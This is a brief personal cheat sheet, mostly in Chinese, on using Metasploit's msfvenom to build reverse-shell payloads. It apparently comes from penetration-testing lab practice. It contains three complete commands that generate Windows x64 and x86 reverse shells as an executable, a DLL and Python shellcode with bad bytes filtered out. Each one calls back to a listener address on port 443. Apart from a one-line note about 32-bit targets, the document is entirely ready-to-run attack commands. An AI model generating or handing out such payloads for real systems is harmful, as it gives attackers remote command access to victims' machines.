用metaexploit建立netcat reverse shell
msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.154 LPORT=443 -f exe -o shell.exe msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.154 LPORT=443 -f dll -o shell.dll msfvenom -p windows/shell_reverse_tcp LHOST=192.168.45.171 LPORT=443 -f python -v shellcode -b "\x00\x20" 作業系統,或應用程式,可能是32 bit